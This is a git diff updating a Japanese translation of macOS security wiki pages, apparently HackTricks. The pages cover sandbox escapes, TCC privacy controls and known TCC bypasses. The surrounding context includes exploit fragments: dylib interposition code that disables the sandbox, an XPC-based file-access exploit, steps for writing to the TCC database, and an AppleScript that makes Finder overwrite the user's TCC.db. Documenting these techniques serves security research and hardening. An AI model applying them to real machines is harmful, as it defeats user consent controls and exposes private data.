-このXPCサービスは、`extendAccessToURL:completion:`メソッドを介して、任意のURLに対する読み取りおよび書き込みアクセスをXPCクライアントに提供することを可能にします。このXPCサービスにはFDAがあるため、これらの権限を悪用してTCCを完全にバイパスすることが可能です。
+このXPCサービスは、`extendAccessToURL:completion:`メソッドを介してXPCクライアントに任意のURLへの読み取りおよび書き込みアクセスを提供することを可能にします。このXPCサービスにはFDAがあるため、これらの権限を悪用してTCCを完全にバイパスすることが可能です。
 
 エクスプロイトは:
 ```objectivec
@@ -203,23 +203,23 @@ NSLog(@"Read the target content:%@", [NSData dataWithContentsOfURL:targetURL]);
 }];
 }
 ```
-### 静的コンパイルと動的リンク
+### Static Compiling & Dynamically linking
 
 [**この研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)では、Sandboxをバイパスする2つの方法が発見されました。Sandboxは、**libSystem**ライブラリがロードされるときにユーザーランドから適用されます。バイナリがそれをロードしないことができれば、Sandboxに入ることはありません:
 
 - バイナリが**完全に静的にコンパイルされている**場合、そのライブラリをロードせずに済みます。
 - **バイナリがライブラリをロードする必要がない**場合(リンカーもlibSystemにあるため)、libSystemをロードする必要はありません。
 
-### シェルコード
+### Shellcodes
 
-**シェルコード**であっても、ARM64では`libSystem.dylib`にリンクする必要があることに注意してください:
+**シェルコード**はARM64でも`libSystem.dylib`にリンクする必要があることに注意してください:
 ```bash
 ld -o shell shell.o -macosx_version_min 13.0
 ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
 ```
 ### 継承されない制限
 
-**[この書き込みのボーナス](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** で説明されているように、サンドボックスの制限は次のようになります:
+**[この書き込みのボーナス](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** で説明されているように、サンドボックスの制限は次のようになります:
 ```
 (version 1)
 (allow default)
@@ -248,13 +248,14 @@ open /tmp/poc.app
 ```
 ### インターポスティングバイパス
 
-**インターポスティング**に関する詳細は以下を参照してください:
+**インターポスティング**に関する詳細情報は以下を参照してください:
+
 
 {{#ref}}
 ../../../macos-proces-abuse/macos-function-hooking.md
 {{#endref}}
 
-#### サンドボックスを防ぐために `_libsecinit_initializer` をインターポストする
+#### サンドボックスを防ぐために`_libsecinit_initializer`をインターポストする
 ```c
 // gcc -dynamiclib interpose.c -o interpose.dylib
 
@@ -278,7 +279,7 @@ DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
 _libsecinit_initializer called
 Sandbox Bypassed!
 ```
-#### Interpost `__mac_syscall` でサンドボックスを防ぐ
+#### Interpost `__mac_syscall` を使用してサンドボックスを防ぐ
 ```c:interpose.c
 // gcc -dynamiclib interpose.c -o interpose.dylib
 
@@ -322,7 +323,7 @@ __mac_syscall invoked. Policy: Quarantine, Call: 87
 __mac_syscall invoked. Policy: Sandbox, Call: 4
 Sandbox Bypassed!
 ```
-### lldbを使用したSandboxのデバッグとバイパス
+### Debug & bypass Sandbox with lldb
 
 サンドボックス化されるべきアプリケーションをコンパイルしましょう:
 
@@ -361,7 +362,7 @@ system("cat ~/Desktop/del.txt");
 {{#endtab}}
 {{#endtabs}}
 
-次にアプリをコンパイルします:
+次にアプリをコンパイルします:
 ```bash
 # Compile it
 gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand
@@ -372,14 +373,14 @@ gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.pli
 codesign -s  --entitlements entitlements.xml sand
 ```
 > [!CAUTION]
-> アプリは **`~/Desktop/del.txt`** ファイルを**読み取ろうとします**が、**Sandboxはそれを許可しません**。\
-> Sandboxがバイパスされると読み取れるように、そこにファイルを作成してください:
+> アプリは **`~/Desktop/del.txt`** ファイルを **Sandboxが許可しない** 状態で **読み取ろう** とします。\
+> Sandboxがバイパスされると読み取れるように、そこにファイルを作成してください:
 >
 > ```bash
 > echo "Sandbox Bypassed" > ~/Desktop/del.txt
 > ```
 
-アプリケーションをデバッグして、Sandboxがいつ読み込まれるかを見てみましょう:
+アプリケーションをデバッグして、Sandboxがいつロードされるかを見てみましょう:
 ```bash
 # Load app in debugging
 lldb ./sand
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
index 5fed9eb82..c5ce28171 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
@@ -6,15 +6,15 @@
 
 **TCC (透明性、同意、制御)** は、アプリケーションの権限を規制することに焦点を当てたセキュリティプロトコルです。その主な役割は、**位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、フルディスクアクセス**などの機密機能を保護することです。TCCは、これらの要素へのアプリアクセスを許可する前に明示的なユーザーの同意を義務付けることで、プライバシーとユーザーのデータに対する制御を強化します。
 
-ユーザーは、アプリケーションが保護された機能へのアクセスを要求する際にTCCに遭遇します。これは、ユーザーが**アクセスを承認または拒否**できるプロンプトを通じて表示されます。さらに、TCCは、特定のファイルへのアクセスを許可するために、**ファイルをアプリケーションにドラッグアンドドロップする**などの直接的なユーザーアクションを受け入れ、アプリケーションが明示的に許可されたものにのみアクセスできるようにします。
+ユーザーは、アプリケーションが保護された機能へのアクセスを要求する際にTCCに遭遇します。これは、ユーザーが**アクセスを承認または拒否**できるプロンプトを通じて表示されます。さらに、TCCは、特定のファイルへのアクセスを許可するために、**アプリケーションにファイルをドラッグアンドドロップする**などの直接的なユーザーアクションを受け入れ、アプリケーションが明示的に許可されたものにのみアクセスできるようにします。
 
 ![TCCプロンプトの例](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
 
 **TCC**は、`/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`にある**デーモン**によって処理され、`/System/Library/LaunchDaemons/com.apple.tccd.system.plist`で構成されています(machサービス`com.apple.tccd.system`を登録)。
 
-ログインしている各ユーザーごとに実行される**ユーザーモードのtccd**があり、`/System/Library/LaunchAgents/com.apple.tccd.plist`で定義され、machサービス`com.apple.tccd`および`com.apple.usernotifications.delegate.com.apple.tccd`を登録しています。
+ログインしている各ユーザーごとに実行される**ユーザーモードのtccd**があり、`/System/Library/LaunchAgents/com.apple.tccd.plist`で定義され、machサービス`com.apple.tccd`と`com.apple.usernotifications.delegate.com.apple.tccd`を登録しています。
 
-ここでは、tccdがシステムとしておよびユーザーとして実行されている様子を確認できます:
+ここでは、tccdがシステムとしておよびユーザーとして実行されている様子を見ることができます:
 ```bash
 ps -ef | grep tcc
 0   374     1   0 Thu07PM ??         2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
@@ -22,30 +22,30 @@ ps -ef | grep tcc
 ```
 Permissions are **親**アプリケーションから**継承**され、**権限**は**バンドルID**と**開発者ID**に基づいて**追跡**されます。
 
-### TCCデータベース
+### TCC データベース
 
-許可/拒否は、いくつかのTCCデータベースに保存されます:
+許可/拒否は、いくつかの TCC データベースに保存されます:
 
-- **`/Library/Application Support/com.apple.TCC/TCC.db`** にあるシステム全体のデータベース。
+- システム全体のデータベースは **`/Library/Application Support/com.apple.TCC/TCC.db`** にあります。
 - このデータベースは**SIP保護**されているため、SIPバイパスのみが書き込むことができます。
-- ユーザーTCCデータベースは、ユーザーごとの設定用の**`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**です。
-- このデータベースは保護されているため、フルディスクアクセスのような高いTCC権限を持つプロセスのみが書き込むことができます(ただし、SIPによって保護されていません)。
+- ユーザー TCC データベース **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** は、ユーザーごとの設定用です。
+- このデータベースは保護されているため、フルディスクアクセスのような高い TCC 権限を持つプロセスのみが書き込むことができます(ただし、SIP によって保護されているわけではありません)。
 
 > [!WARNING]
-> 前述のデータベースは、**読み取りアクセスのためにTCC保護**されています。したがって、**TCC特権プロセス**からでない限り、通常のユーザーTCCデータベースを**読み取ることはできません**。
+> 前述のデータベースは、**読み取りアクセスのために TCC 保護**されています。したがって、**TCC 権限のあるプロセス**からでない限り、通常のユーザー TCC データベースを**読み取ることはできません**。
 >
-> ただし、これらの高い権限を持つプロセス(**FDA**や**`kTCCServiceEndpointSecurityClient`**など)は、ユーザーのTCCデータベースに書き込むことができます。
+> ただし、これらの高い権限を持つプロセス(**FDA** または **`kTCCServiceEndpointSecurityClient`** など)は、ユーザーの TCC データベースに書き込むことができます。
 
-- **`/var/db/locationd/clients.plist`** にある**第三の**TCCデータベースは、**位置情報サービス**にアクセスを許可されたクライアントを示します。
-- SIP保護されたファイル**`/Users/carlospolop/Downloads/REG.db`**(TCCによる読み取りアクセスからも保護されています)は、すべての**有効なTCCデータベース**の**位置**を含んでいます。
-- SIP保護されたファイル**`/Users/carlospolop/Downloads/MDMOverrides.plist`**(TCCによる読み取りアクセスからも保護されています)は、さらに多くのTCC付与された権限を含んでいます。
-- SIP保護されたファイル**`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**(誰でも読み取れる)は、TCC例外を必要とするアプリケーションの許可リストです。
+- **`/var/db/locationd/clients.plist`** に**第三の** TCC データベースがあり、**位置情報サービス**にアクセスを許可されたクライアントを示します。
+- SIP 保護されたファイル **`/Users/carlospolop/Downloads/REG.db`**(TCC による読み取りアクセスからも保護されています)は、すべての**有効な TCC データベース**の**位置**を含んでいます。
+- SIP 保護されたファイル **`/Users/carlospolop/Downloads/MDMOverrides.plist`**(TCC による読み取りアクセスからも保護されています)は、さらに多くの TCC 許可された権限を含んでいます。
+- SIP 保護されたファイル **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**(誰でも読み取れる)は、TCC 例外を必要とするアプリケーションの許可リストです。
 
 > [!TIP]
-> **iOS**のTCCデータベースは**`/private/var/mobile/Library/TCC/TCC.db`**にあります。
+> **iOS** の TCC データベースは **`/private/var/mobile/Library/TCC/TCC.db`** にあります。
 
-> [!NOTE]
-> **通知センターUI**は、**システムTCCデータベース**に**変更**を加えることができます:
+> [!TIP]
+> **通知センター UI** は、**システム TCC データベース**に**変更**を加えることができます:
 >
 > ```bash
 > codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/> Support/tccd
@@ -54,7 +54,7 @@ Permissions are **親**アプリケーションから**継承**され、**権限
 > com.apple.rootless.storage.TCC
 > ```
 >
-> ただし、ユーザーは**`tccutil`**コマンドラインユーティリティを使用して**ルールを削除または照会**できます。
+> ただし、ユーザーは **`tccutil`** コマンドラインユーティリティを使用して**ルールを削除または照会**できます。
 
 #### データベースの照会
 
@@ -104,8 +104,8 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
 > [!TIP]
 > 両方のデータベースを確認することで、アプリが許可した、禁止した、または持っていない権限を確認できます(要求されます)。
 
-- **`service`** は TCC **permission** の文字列表現です
-- **`client`** は **bundle ID** または権限を持つ **バイナリへのパス** です
+- **`service`** は TCC **権限** の文字列表現です
+- **`client`** は **バンドル ID** または権限を持つ **バイナリへのパス** です
 - **`client_type`** は、それがバンドル識別子(0)か絶対パス(1)かを示します
 
 

@@ -153,7 +153,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
 
 - **`auth_value`** は異なる値を持つことができます: denied(0), unknown(1), allowed(2), または limited(3)。
 - **`auth_reason`** は次の値を取ることができます: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
-- **csreq** フィールドは、実行するバイナリを検証し、TCC権限を付与する方法を示すためにあります:
+- **csreq** フィールドは、実行するバイナリを検証し、TCC 権限を付与する方法を示すためにあります:
 ```bash
 # Query to get cserq in printable hex
 select service, client, hex(csreq) from access where auth_value=2;
@@ -169,9 +169,9 @@ echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
 REQ_HEX=$(xxd -p /tmp/csreq.bin  | tr -d '\n')
 echo "X'$REQ_HEX'"
 ```
-- その他のフィールドに関する詳細は、[**このブログ記事**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)を確認してください。
+- その他のフィールドに関する詳細は、[**このブログ記事を確認してください**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive) 。
 
-`システム環境設定 --> セキュリティとプライバシー --> プライバシー --> ファイルとフォルダ`で、アプリに**すでに与えられた権限**を確認することもできます。
+`System Preferences --> Security & Privacy --> Privacy --> Files and Folders` でアプリに**既に与えられた権限**を確認することもできます。
 
 > [!TIP]
 > ユーザーは**`tccutil`**を使用して**ルールを削除またはクエリ**することができます。
@@ -206,7 +206,7 @@ csreq -t -r /tmp/telegram_csreq.bin
 アプリは**リクエスト**を行い、いくつかのリソースへの**アクセスを許可される**だけでなく、**関連する権限を持っている必要があります**。\
 例えば、**Telegram**はカメラへの**アクセスをリクエストするために**`com.apple.security.device.camera`という権限を持っています。**この権限を持たないアプリは**カメラにアクセスできません(ユーザーに権限を求めることすらありません)。
 
-ただし、アプリが`~/Desktop`、`~/Downloads`、`~/Documents`などの**特定のユーザーフォルダにアクセスするためには、特別な**権限を持つ必要はありません。システムはアクセスを透過的に処理し、必要に応じて**ユーザーにプロンプトを表示します**。
+ただし、アプリが`~/Desktop`、`~/Downloads`、`~/Documents`などの**特定のユーザーフォルダにアクセスするためには、特定の**権限を持つ必要はありません。システムはアクセスを透過的に処理し、必要に応じて**ユーザーにプロンプトを表示します**。
 
 Appleのアプリは**プロンプトを生成しません**。それらは**権限**リストに**事前に付与された権利**を含んでおり、つまり**ポップアップを生成することは決してなく**、**TCCデータベース**にも表示されません。例えば:
 ```bash
@@ -222,7 +222,7 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
 これにより、カレンダーがユーザーにリマインダー、カレンダー、アドレスブックへのアクセスを求めることを避けることができます。
 
 > [!TIP]
-> 権限に関する公式文書の他に、**非公式の興味深い情報を見つけることも可能です** [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl)
+> 権限に関する公式文書の他に、**非公式の興味深い情報が** [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) で見つけることも可能です。
 
 いくつかのTCC権限は、kTCCServiceAppleEvents、kTCCServiceCalendar、kTCCServicePhotosなどです。すべてを定義する公開リストはありませんが、この[**既知のリスト**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service)を確認できます。
 
@@ -234,7 +234,7 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
 
 ### ユーザーの意図 / com.apple.macl
 
-前述のように、**ファイルにアクセスを許可するためにアプリにドラッグ&ドロップすることが可能です**。このアクセスは、いかなるTCCデータベースにも指定されませんが、**ファイルの拡張属性**として保存されます。この属性は、許可されたアプリの**UUID**を**保存します**。
+前述のように、**ファイルにアプリへのアクセスを付与するためにドラッグ&ドロップすることが可能です**。このアクセスは、いかなるTCCデータベースにも指定されませんが、**ファイルの拡張属性**として保存されます。この属性は、許可されたアプリの**UUID**を**保存します**。
 ```bash
 xattr Desktop/private.txt
 com.apple.macl
@@ -249,18 +249,18 @@ Filename,Header,App UUID
 otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid
 uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
 ```
-> [!NOTE]
+> [!TIP]
 > **`com.apple.macl`** 属性は **Sandbox** によって管理されており、tccd ではありません。
 >
 > また、コンピュータ内のアプリの UUID を許可するファイルを別のコンピュータに移動すると、同じアプリが異なる UID を持つため、そのアプリへのアクセスは許可されません。
 
-拡張属性 `com.apple.macl` は **SIP によって保護されているため**、他の拡張属性のように **クリアすることはできません**。ただし、[**この投稿で説明されているように**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)、ファイルを **圧縮** し、**削除** し、**解凍** することで無効にすることが可能です。
+拡張属性 `com.apple.macl` **は他の拡張属性のようにクリアできません**。なぜなら、**SIP によって保護されているからです**。しかし、[**この投稿で説明されているように**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)、ファイルを **圧縮** し、**削除** し、**解凍** することで無効にすることが可能です。
 
 ## TCC Privesc & Bypasses
 
 ### TCC への挿入
 
-もし、TCC データベースに対して書き込みアクセスを取得できた場合、以下のようなものを使用してエントリを追加できます(コメントを削除してください):
+もし、ある時点で TCC データベースに対して書き込みアクセスを取得できた場合、以下のようなものを使用してエントリを追加できます(コメントを削除してください):
 
 

 
@@ -316,7 +316,7 @@ macos-tcc-payloads.md
 
 ### Apple Events
 
-Apple Eventsについては、以下を参照してください:
+Apple Eventsについて学ぶ:
 
 {{#ref}}
 macos-apple-events.md
@@ -361,7 +361,7 @@ EOD
 これを悪用して**独自のユーザーTCCデータベースを作成する**ことができます。
 
 > [!WARNING]
-> この権限を持つことで、**FinderにTCC制限フォルダーへのアクセスを要求し**、ファイルを取得することができますが、私の知る限り、**Finderに任意のコードを実行させることはできません**。そのため、FDAアクセスを完全に悪用することはできません。
+> この権限を持つことで、**FinderにTCC制限フォルダーへのアクセスを要求し**、ファイルを取得することができますが、私の知る限り、**Finderに任意のコードを実行させることはできません**。そのため、完全にFDAアクセスを悪用することはできません。
 >
 > したがって、完全なFDA機能を悪用することはできません。
 
@@ -444,7 +444,7 @@ rm "$HOME/Desktop/file"
 ```
 ### Automation (SE) + Accessibility (**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)** to FDA\*
 
-**`System Events`**上のAutomation + Accessibility (**`kTCCServicePostEvent`**) は、**プロセスにキーストロークを送信する**ことを可能にします。この方法で、Finderを悪用してユーザーのTCC.dbを変更したり、任意のアプリにFDAを付与したりすることができます(ただし、これにはパスワードの入力が求められる場合があります)。
+**`System Events`**上のAutomation + Accessibility (**`kTCCServicePostEvent`**) は、**プロセスにキーストロークを送信する**ことを可能にします。この方法で、Finderを悪用してユーザーのTCC.dbを変更したり、任意のアプリにFDAを付与したりすることができます(ただし、そのためにパスワードの入力が求められる場合があります)。
 
 FinderがユーザーのTCC.dbを上書きする例:
 ```applescript
@@ -494,39 +494,39 @@ EOF
 ```
 ### `kTCCServiceAccessibility` to FDA\*
 
-このページで、**アクセシビリティ権限を悪用するためのペイロード**を確認してください [**payloads to abuse the Accessibility permissions**](macos-tcc-payloads.md#accessibility) FDA\* への特権昇格や、例えばキーロガーを実行するために。
+このページで、**アクセシビリティ権限を悪用するためのペイロード**を確認してください(macos-tcc-payloads.md#accessibility)FDA\*に昇格するか、例えばキーロガーを実行するために。
 
-### **Endpoint Security Client to FDA**
+### **エンドポイントセキュリティクライアントからFDAへ**
 
-**`kTCCServiceEndpointSecurityClient`** を持っていれば、FDAがあります。終了。
+**`kTCCServiceEndpointSecurityClient`**を持っていれば、FDAがあります。終了。
 
-### System Policy SysAdmin File to FDA
+### システムポリシーSysAdminファイルからFDAへ
 
-**`kTCCServiceSystemPolicySysAdminFiles`** は、ユーザーの **`NFSHomeDirectory`** 属性を **変更** することを許可し、これによりホームフォルダを変更し、**TCCをバイパス** することができます。
+**`kTCCServiceSystemPolicySysAdminFiles`**は、ユーザーの**`NFSHomeDirectory`**属性を**変更**することを許可し、これによりホームフォルダを変更し、**TCCをバイパス**することができます。
 
-### User TCC DB to FDA
+### ユーザーTCC DBからFDAへ
 
-**ユーザーTCC** データベースに対する **書き込み権限** を取得しても、**`FDA`** 権限を自分に付与することはできません。システムデータベースに存在する者だけがそれを付与できます。
+**ユーザーTCC**データベースに対する**書き込み権限**を取得しても、**`FDA`**権限を自分に付与することはできません。システムデータベースに存在する者だけがそれを付与できます。
 
-しかし、**`Finderへの自動化権限`** を自分に与えることができ、前述の技術を悪用してFDA\*に昇格することができます。
+しかし、**`Finderへの自動化権限`**を自分に与え、前述の技術を悪用してFDA\*に昇格することはできます。
 
-### **FDA to TCC permissions**
+### **FDAからTCC権限へ**
 
-**フルディスクアクセス** のTCC名は **`kTCCServiceSystemPolicyAllFiles`** です。
+**フルディスクアクセス**のTCC名は**`kTCCServiceSystemPolicyAllFiles`**です。
 
-これは実際の特権昇格ではないと思いますが、もし役立つ場合に備えて: FDAを制御するプログラムがあれば、**ユーザーのTCCデータベースを変更して自分に任意のアクセスを与えることができます**。これは、FDA権限を失う可能性がある場合の持続技術として役立つかもしれません。
+これは実際の昇格ではないと思いますが、もし役立つ場合に備えて:FDAを制御するプログラムを持っている場合、**ユーザーのTCCデータベースを変更して自分に任意のアクセスを与えることができます**。これは、FDA権限を失う可能性がある場合の持続技術として役立つかもしれません。
 
-### **SIP Bypass to TCC Bypass**
+### **SIPバイパスからTCCバイパスへ**
 
-システムの **TCCデータベース** は **SIP** によって保護されているため、**指定された権限を持つプロセスのみがそれを変更できる**のです。したがって、攻撃者が **ファイルに対するSIPバイパス** を見つけた場合(SIPによって制限されたファイルを変更できる)、彼は以下のことができます:
+システムの**TCCデータベース**は**SIP**によって保護されているため、**指定された権利を持つプロセスのみがそれを変更できる**のです。したがって、攻撃者が**ファイルに対するSIPバイパス**を見つけた場合(SIPによって制限されたファイルを変更できる場合)、彼は以下のことができます:
 
-- **TCCデータベースの保護を削除** し、すべてのTCC権限を自分に与えることができます。例えば、これらのファイルのいずれかを悪用することができます:
+- **TCCデータベースの保護を削除**し、自分にすべてのTCC権限を与えることができます。例えば、これらのファイルのいずれかを悪用することができます:
 - TCCシステムデータベース
 - REG.db
 - MDMOverrides.plist
 
-ただし、**TCCをバイパスするためのSIPバイパス**を悪用する別のオプションがあります。ファイル `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` は、TCC例外を必要とするアプリケーションの許可リストです。したがって、攻撃者がこのファイルから **SIP保護を削除** し、**自分のアプリケーション** を追加できれば、そのアプリケーションはTCCをバイパスできるようになります。\
-例えば、ターミナルを追加するために:
+ただし、**TCCをバイパスするためのSIPバイパス**を悪用する別のオプションがあります。ファイル`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`は、TCC例外を必要とするアプリケーションの許可リストです。したがって、攻撃者がこのファイルから**SIP保護を削除**し、自分の**アプリケーションを追加**できれば、そのアプリケーションはTCCをバイパスできるようになります。\
+例えば、ターミナルを追加するために:
 ```bash
 # Get needed info
 codesign -d -r- /System/Applications/Utilities/Terminal.app
@@ -556,6 +556,7 @@ AllowApplicationsList.plist:
 ```
 ### TCC バイパス
 
+
 {{#ref}}
 macos-tcc-bypasses/
 {{#endref}}
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
index 3b27d6372..8909f07d7 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
@@ -6,7 +6,7 @@
 
 ### 書き込みバイパス
 
-これはバイパスではなく、TCCの動作方法です: **書き込みから保護されていません**。もしTerminalがユーザーのデスクトップを読み取るアクセス権を持っていなくても、**そこに書き込むことは可能です**:
+これはバイパスではなく、TCCの動作方法です: **書き込みから保護されていません**。ターミナルが**ユーザーのデスクトップを読み取るアクセス権を持っていなくても、そこに書き込むことができます**:
 ```shell-session
 username@hostname ~ % ls Desktop
 ls: Desktop: Operation not permitted
@@ -20,14 +20,14 @@ asd
 
 ### TCC ClickJacking
 
-**TCCプロンプトの上にウィンドウを置く** ことで、ユーザーが気づかずに **受け入れる** ことが可能です。PoCは [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** で見つけることができます。**
+**TCCプロンプトの上にウィンドウを置く** ことで、ユーザーがそれを **受け入れる** ようにすることが可能です。PoCは [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** で見つけることができます。**
 
 
https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg

 
 ### 任意の名前によるTCCリクエスト
 
-攻撃者は **任意の名前** (例: Finder, Google Chrome...) のアプリを **`Info.plist`** に作成し、TCCで保護された場所へのアクセスを要求させることができます。ユーザーは、正当なアプリケーションがこのアクセスを要求していると思うでしょう。\
-さらに、**正当なアプリをDockから削除し、偽のアプリを置く** ことが可能です。ユーザーが偽のアプリ(同じアイコンを使用できる)をクリックすると、正当なアプリを呼び出し、TCCの権限を要求し、マルウェアを実行させ、正当なアプリがアクセスを要求したと信じ込ませることができます。
+攻撃者は **任意の名前** (例: Finder, Google Chrome...) のアプリを **`Info.plist`** に作成し、TCCで保護された場所へのアクセスをリクエストさせることができます。ユーザーは、正当なアプリケーションがこのアクセスをリクエストしていると思うでしょう。\
+さらに、**正当なアプリをDockから削除し、偽のアプリをその上に置く** ことが可能です。ユーザーが偽のアプリ(同じアイコンを使用できる)をクリックすると、正当なアプリを呼び出し、TCCの権限を要求し、マルウェアを実行させ、正当なアプリがアクセスを要求したと信じ込ませることができます。
 
 

 
@@ -54,7 +54,7 @@ asd
 
 属性 **`com.apple.macl`** はファイルに与えられ、**特定のアプリケーションにそれを読む権限を与えます。** この属性は、**ドラッグ&ドロップ** でファイルをアプリに移動したとき、またはユーザーが **ダブルクリック** して **デフォルトアプリケーション** でファイルを開くときに設定されます。
 
-したがって、ユーザーは **悪意のあるアプリを登録** してすべての拡張子を処理し、Launch Servicesを呼び出して **任意のファイルを開く** ことができます(そのため、悪意のあるファイルは読み取るアクセスを与えられます)。
+したがって、ユーザーは **悪意のあるアプリを登録** してすべての拡張子を処理し、Launch Servicesを呼び出して **任意のファイルを開く** ことができます(そのため、悪意のあるファイルはそれを読むアクセスを与えられます)。
 
 ### iCloud
 
@@ -66,7 +66,7 @@ asd
 
 ### kTCCServiceAppleEvents / 自動化
 
-**`kTCCServiceAppleEvents`** 権限を持つアプリは、**他のアプリを制御する** ことができます。これは、他のアプリに付与された権限を **悪用する** 可能性があることを意味します。
+**`kTCCServiceAppleEvents`** 権限を持つアプリは、**他のアプリを制御する** ことができます。これは、他のアプリに付与された権限を **悪用する** ことができることを意味します。
 
 Apple Scriptsに関する詳細情報は以下を確認してください:
 
@@ -80,7 +80,7 @@ macos-apple-scripts.md
 
 #### iTerm上で
 
-FDAを持たないTerminalは、FDAを持つiTermを呼び出し、それを使用してアクションを実行できます:
+フルディスクアクセスを持たないTerminalは、フルディスクアクセスを持つiTermを呼び出し、それを使用してアクションを実行できます:
 ```applescript:iterm.script
 tell application "iTerm"
 activate
@@ -151,9 +151,9 @@ $> ls ~/Documents
 
 ### CVE-2021-30782 - トランスロケーション
 
-バイナリ`/usr/libexec/lsd`は、ライブラリ`libsecurity_translocate`を使用しており、権限`com.apple.private.nullfs_allow`を持っていたため、**nullfs**マウントを作成でき、権限`com.apple.private.tcc.allow`を持っており、**`kTCCServiceSystemPolicyAllFiles`**を使用してすべてのファイルにアクセスできました。
+バイナリ`/usr/libexec/lsd`は、ライブラリ`libsecurity_translocate`を持ち、`com.apple.private.nullfs_allow`という権限があり、**nullfs**マウントを作成でき、`com.apple.private.tcc.allow`という権限を持ち、**`kTCCServiceSystemPolicyAllFiles`**を使用してすべてのファイルにアクセスできました。
 
-「Library」に検疫属性を追加し、**`com.apple.security.translocation`** XPCサービスを呼び出すことが可能で、その後、Libraryは**`$TMPDIR/AppTranslocation/d/d/Library`**にマッピングされ、Library内のすべてのドキュメントに**アクセス**できるようになりました。
+「Library」にクアランティン属性を追加し、**`com.apple.security.translocation`** XPCサービスを呼び出すことが可能で、その後、Libraryを**`$TMPDIR/AppTranslocation/d/d/Library`**にマッピングし、Library内のすべてのドキュメントに**アクセス**できるようになりました。
 
 ### CVE-2023-38571 - Music & TV 
 
@@ -162,16 +162,16 @@ $> ls ~/Documents
 - `a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"`
 - `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3"`
 
-この**`rename(a, b);`**の動作は**レースコンディション**に対して脆弱であり、`Automatically Add to Music.localized`フォルダー内に偽の**TCC.db**ファイルを置き、新しいフォルダー(b)が作成されるときにファイルをコピーし、それを削除して**`~/Library/Application Support/com.apple.TCC`**にポイントすることが可能です。
+この**`rename(a, b);`**の動作は**レースコンディション**に対して脆弱であり、`Automatically Add to Music.localized`フォルダ内に偽の**TCC.db**ファイルを置き、新しいフォルダ(b)が作成されるときにファイルをコピーし、それを削除し、**`~/Library/Application Support/com.apple.TCC`**にポイントすることが可能です。
 
 ### SQLITE_SQLLOG_DIR - CVE-2023-32422
 
-**`SQLITE_SQLLOG_DIR="path/folder"`**は基本的に**任意のオープンDBがそのパスにコピーされる**ことを意味します。このCVEでは、この制御が悪用され、**SQLiteデータベース**の中に**書き込まれ**、そのデータベースが**FDAのTCCデータベースを持つプロセスによってオープンされる**ことになり、**`SQLITE_SQLLOG_DIR`**を**ファイル名にシンボリックリンク**を使用して悪用し、そのデータベースが**オープン**されると、ユーザーの**TCC.dbが上書き**されます。\
-**詳細情報** [**こちらの解説**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **および**[ **こちらのトーク**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s)。
